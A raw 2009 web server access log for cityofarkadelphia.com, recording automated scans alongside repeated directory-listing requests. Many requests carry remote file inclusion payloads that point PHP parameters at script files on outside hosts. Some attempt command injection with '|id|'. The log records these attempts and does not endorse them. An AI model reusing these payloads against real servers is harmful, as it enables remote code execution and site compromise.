218.232.105.116 - - [30/Jun/2009:19:17:55 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:18:22 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:18:22 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [30/Jun/2009:19:18:45 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.120.237.150 - - [30/Jun/2009:19:20:54 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
62.128.135.52 - - [30/Jun/2009:19:21:23 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:21:58 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:22:03 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:19:22:16 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [30/Jun/2009:19:22:17 -0700] "GET /logs/access_080330.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.33.143.3 - - [30/Jun/2009:19:22:29 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.120.237.150 - - [30/Jun/2009:19:23:21 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:23:21 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.120.237.150 - - [30/Jun/2009:19:23:21 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
216.120.237.150 - - [30/Jun/2009:19:23:21 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:23:27 -0700] "GET /?N=D?N=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
213.33.143.3 - - [30/Jun/2009:19:23:59 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.33.143.3 - - [30/Jun/2009:19:23:59 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
213.33.143.3 - - [30/Jun/2009:19:23:59 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:24:13 -0700] "GET /?D=A?N=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:24:57 -0700] "GET /logs/access_080601.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:25:40 -0700] "GET /?S=ADownloads/?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:25:55 -0700] "GET /?D=A?N=A?D=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:26:47 -0700] "GET /?N=D?N=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:26:50 -0700] "GET /?S=A?S=D?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:27:21 -0700] "GET /?N=D?N=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:27:28 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:27:28 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:27:28 -0700] "GET /logs/access_080601.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:27:34 -0700] "GET /?S=ADownloads/Downloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
62.128.135.52 - - [30/Jun/2009:19:27:41 -0700] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.128.135.52 - - [30/Jun/2009:19:27:42 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.128.135.52 - - [30/Jun/2009:19:27:42 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.hausarztpraxis-rettstadt.de/images/blink?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:27:54 -0700] "GET /?D=A?D=D?D=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:28:05 -0700] "GET /?D=A?D=D?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:28:16 -0700] "GET /?M=A?N=A?M=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:28:19 -0700] "GET /?M=A?N=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:28:44 -0700] "GET /?N=Dtmp/?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:28:45 -0700] "GET /?S=A?D=ADownloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:10 -0700] "GET /?N=Dtmp/tmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:12 -0700] "GET /?N=Dtmp/?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:23 -0700] "GET /?M=Atmp/?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:29 -0700] "GET /?M=Atmp/?M=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:40 -0700] "GET /?D=A?S=ADownloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:46 -0700] "GET /?M=Atmp/?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:54 -0700] "GET /?M=Atmp/tmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:29:55 -0700] "GET /?N=Dtmp/?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:09 -0700] "GET /?M=A?N=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:10 -0700] "GET /?S=A?N=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:17 -0700] "GET /?M=A?N=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:21 -0700] "GET /?D=A?D=D?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:29 -0700] "GET /?D=A?N=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:36 -0700] "GET /?S=A?M=ADownloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:43 -0700] "GET /?N=D?N=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:49 -0700] "GET /?N=D?S=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:53 -0700] "GET /?N=D?D=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:30:57 -0700] "GET /?N=D?S=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:02 -0700] "GET /?D=A?S=A?D=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:03 -0700] "GET /?D=A?S=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:15 -0700] "GET /?D=A?M=ADownloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:16 -0700] "GET /?N=D?S=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:24 -0700] "GET /?M=A?D=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:25 -0700] "GET /?M=A?S=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:30 -0700] "GET /?M=A?S=A?M=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:30 -0700] "GET /?M=A?D=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:31:30 -0700] "GET /logs/access_080601.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:31:30 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:31:30 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:36 -0700] "GET /?S=A?D=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:40 -0700] "GET /?D=A?M=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:46 -0700] "GET /Downloads/?N=D?N=A HTTP/1.1" 200 671 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:55 -0700] "GET /?S=A?M=A?S=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:57 -0700] "GET /?S=A?M=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:31:59 -0700] "GET /?S=A?M=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:01 -0700] "GET /?N=D?M=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:04 -0700] "GET /?M=A?D=A?M=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:08 -0700] "GET /?M=A?D=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:12 -0700] "GET /?M=A?S=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:13 -0700] "GET /?M=A?S=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:20 -0700] "GET /?N=D?D=Atmp/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:25 -0700] "GET /?N=D?S=A?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:30 -0700] "GET /?N=D?D=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:32:31 -0700] "GET /logs/access_081001.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:32:31 -0700] "GET /htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:32:32 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:32 -0700] "GET /?D=ADownloads/?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:35 -0700] "GET /?D=A?S=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:37 -0700] "GET /?N=D?D=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:38 -0700] "GET /?S=A?D=A?M=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:32:40 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:42 -0700] "GET /?S=A?D=A?S=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:44 -0700] "GET /?S=A?S=DDownloads/ HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:46 -0700] "GET /?S=A?D=A?D=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:48 -0700] "GET /?D=ADownloads/?S=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:50 -0700] "GET /?M=A?D=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:54 -0700] "GET /?N=D?S=A?N=A HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:32:56 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:32:56 -0700] "GET /htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:32:56 -0700] "GET /logs/access_081001.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
24.173.210.90 - - [30/Jun/2009:19:32:57 -0700] "GET /?D=ADownloads/?D=D HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:33:02 -0700] "GET /logs/access_081001.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:33:03 -0700] "GET /htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:33:03 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:33:05 -0700] "GET /logs/access_081001.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [30/Jun/2009:19:33:06 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:33:09 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:33:22 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:34:27 -0700] "GET /logs/access_081001.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.67.153.114 - - [30/Jun/2009:19:34:31 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:35:03 -0700] "GET /logs/access_080801.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
213.174.60.24 - - [30/Jun/2009:19:35:46 -0700] "GET /logs/access_081001.log%20%20/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:37:22 -0700] "GET /logs/access_080601.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:38:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:38:44 -0700] "GET /logs/access_080330.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:38:44 -0700] "GET /?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.251.147.130 - - [30/Jun/2009:19:38:55 -0700] "GET /logs/access_080801.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
66.11.230.36 - - [30/Jun/2009:19:39:39 -0700] "GET /logs/access_080531.log%20%20//?path%5Bdocroot%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.214.60.181 - - [30/Jun/2009:19:39:53 -0700] "GET /logs/access_080330.log/aaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.214.60.181 - - [30/Jun/2009:19:39:53 -0700] "GET /aaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
85.214.60.181 - - [30/Jun/2009:19:39:53 -0700] "GET /logs/aaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:39:59 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:39:59 -0700] "GET /htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
151.1.154.24 - - [30/Jun/2009:19:39:59 -0700] "GET /logs/access_081001.log/htmltonuke.php?filnavn=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.50.2.44 - - [30/Jun/2009:19:40:16 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
